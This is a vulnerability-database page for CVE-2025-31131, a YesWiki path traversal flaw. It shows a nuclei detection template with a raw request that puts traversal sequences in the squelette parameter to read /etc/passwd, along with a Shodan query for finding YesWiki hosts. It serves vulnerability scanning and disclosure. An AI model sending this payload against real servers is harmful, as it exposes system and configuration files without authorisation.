Lucene search
K

Yeswiki < 4.5.2 - Unauthenticated Path Traversal

๐Ÿ—“๏ธย 07 Jul 2026ย 16:50:48Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 31ย Views

Yeswiki versions below 4.5.2 are vulnerable to unauthenticated path traversal attacks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Path Traversal in Yeswiki
4 Apr 202515:31
โ€“githubexploit
GithubExploit
Exploit for Path Traversal in Yeswiki
7 Jun 202509:18
โ€“githubexploit
Circl
CVE-2025-31131
1 Apr 202516:32
โ€“circl
CNNVD
YesWiki ่ทฏๅพ„้ๅކๆผๆดž
1 Apr 202500:00
โ€“cnnvd
CVE
CVE-2025-31131
1 Apr 202514:56
โ€“cve
Cvelist
CVE-2025-31131 Path Traversal allowing arbitrary read of files in Yeswiki
1 Apr 202514:56
โ€“cvelist
Exploit DB
YesWiki 4.5.1 - Unauthenticated Path Traversal
7 Apr 202500:00
โ€“exploitdb
EUVD
EUVD-2025-9333
3 Oct 202520:07
โ€“euvd
Github Security Blog
Yeswiki Path Traversal vulnerability allows arbitrary read of files
1 Apr 202518:31
โ€“github
NVD
CVE-2025-31131
1 Apr 202515:16
โ€“nvd
Rows per page
id: CVE-2025-31131

info:
  name: Yeswiki < 4.5.2 - Unauthenticated Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
  impact: |
    Unauthenticated attackers can exploit path traversal through the squelette parameter to read arbitrary files from the YesWiki server, potentially exposing sensitive configuration and data files.
  remediation: |
    This vulnerability is fixed in 4.5.2.
  reference:
    - https://github.com/advisories/GHSA-w34w-fvp3-68xm
    - https://github.com/YesWiki/yeswiki/commit/f78c915369a60c74ab8f38561ae93a4aaca9b989
    - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm
  classification:
    epss-score: 0.05366
    epss-percentile: 0.91679
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-31131
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"yeswiki"
  tags: cve,cve2025,yeswiki,lfi,vuln

http:
  - raw:
      - |
        GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - YesWiki-main

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a004730450221008096412a4e21c82e60821e9033aa59fe287b53b4de0f06455c7179fdd3af993902205fecb8ef799be80ab3f256262bd57ffd788e6a4b20603cb6d088ea683e2eb0ed:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5 - 8.6
EPSS0.05366
SSVC
31